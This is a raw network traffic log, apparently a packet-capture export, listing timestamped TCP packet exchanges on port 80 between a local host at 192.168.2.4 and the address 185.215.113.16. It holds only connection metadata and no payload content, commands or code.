Nov 30, 2024 04:06:36.539885044 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.539928913 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.540740967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.540781021 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.540854931 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.540898085 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.541760921 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.541805029 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.541994095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.542038918 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.542795897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.542840004 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.542901039 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.542946100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.543819904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.543864012 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.543936014 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.543978930 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.544867039 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.544909954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.544979095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.545021057 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.545917034 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.545989990 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.546000004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.546049118 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.546941996 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.546988964 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.547002077 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.547045946 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.547950983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.547996998 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.548060894 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.548103094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.548978090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.549021006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.549038887 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.549077034 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.550019979 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.550060987 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.550132990 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.550175905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.551067114 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.551110983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.551248074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.551291943 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.552119970 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.552164078 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.552210093 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.552253008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.553109884 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.553153992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.553215981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.553260088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.554136992 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.554178953 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.554238081 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.554280043 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.555166006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.555208921 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.555278063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.555327892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.556205034 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.556253910 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.556304932 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.557235956 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.557362080 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.557420969 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.558258057 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.558304071 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.558489084 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.558531046 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.559283018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.559322119 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.559391975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.559434891 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.560319901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.560365915 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.560378075 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.560410976 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.561342001 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.561393023 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.561455965 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.561512947 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.562369108 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.562416077 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.562479019 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.562520027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.563404083 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.563447952 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.563517094 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.563556910 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.564445019 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.564493895 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.564624071 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.564665079 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.565481901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.565525055 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.565592051 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.565634966 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.566504002 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.566553116 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.566627979 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.566679955 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.567564964 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.567610025 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.567620039 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.567662001 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.568573952 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.568666935 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.568676949 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.568768978 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.569600105 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.569650888 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.569700956 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.569744110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.570619106 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.570698977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.570733070 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.570836067 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.571584940 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.571634054 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.720468998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.720540047 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.720645905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.720645905 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.720901012 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.720943928 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.720993996 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.721036911 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.721924067 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.721966028 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.722027063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.722145081 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.722948074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.722990990 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.723054886 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.723098993 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.723994017 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.724036932 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.724095106 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.724137068 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.725025892 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.725068092 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.725121975 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.725163937 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.726061106 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.726104021 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.726142883 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.726182938 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.727078915 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.727123976 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.727161884 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.727202892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.728117943 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.728163004 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.728204012 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.728245020 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.729137897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.729181051 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.729239941 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.729281902 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.730159998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.730201960 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.730252981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.730293989 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.731193066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.731235981 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.731298923 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.731345892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.732239008 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.732285023 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.732302904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.732340097 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.733263016 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.733304977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.733357906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.733400106 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.734286070 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.734332085 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.734396935 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.734437943 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.735317945 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.735361099 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.735424042 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.735470057 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.736351967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.736398935 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.736445904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.736486912 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.737380981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.737421036 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.737487078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.737528086 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.738403082 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.738446951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.738513947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.738555908 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.739435911 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.739480019 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.739543915 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.739593983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.740464926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.740508080 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.740570068 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.740613937 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.741492987 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.741532087 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.741604090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.741650105 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.742531061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.742575884 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.742646933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.742691040 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.743549109 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.743592024 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.743660927 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.743705034 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.744589090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.744632006 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.744704962 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.744741917 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.745630980 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.745687008 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.745765924 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.745810032 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.746642113 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.746686935 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.746761084 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.746802092 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.747667074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.747711897 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.747786045 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.747827053 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.748712063 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.748754978 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.748816013 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.748858929 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.749727011 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.749773026 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.749788046 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.749830961 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.750777006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.750822067 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.750883102 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.750926018 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.751785994 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.751828909 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.751899004 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.751940966 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.752834082 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.752876997 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.752934933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.752976894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.753870010 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.753916025 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.754038095 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.754081011 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.754895926 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.754939079 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.755008936 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.755050898 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.755932093 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.755976915 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.756038904 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.756082058 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.756962061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.757005930 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.757069111 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.757112026 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.757998943 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.758044004 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.758112907 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.758153915 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.759021044 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.759063959 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.759144068 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.759186983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.760056973 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.760099888 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.760160923 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.760204077 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.761086941 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.761130095 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.761207104 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.761249065 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.762115002 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.762157917 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.762228012 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.762270927 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.763142109 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.763187885 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.763252020 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.763293982 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.764174938 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.764215946 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.764276981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.764321089 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.765192032 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.765301943 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.765350103 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.766258001 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.766381025 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.766424894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.767265081 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.767307043 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.767375946 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.767419100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.768296003 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.768338919 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.768409014 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.768445015 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.769323111 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.769370079 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.769432068 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.769471884 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.770350933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.770390034 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.770448923 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.770490885 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.771380901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.771421909 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.771477938 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.771522045 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.772452116 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.772491932 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.772542000 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.772581100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.773454905 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.773499012 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.773557901 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.773600101 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.774434090 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.774476051 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.919822931 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.919852972 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.919980049 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.919980049 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.920290947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.920336008 CET	49822	80	192.168.2.4	185.215.113.16
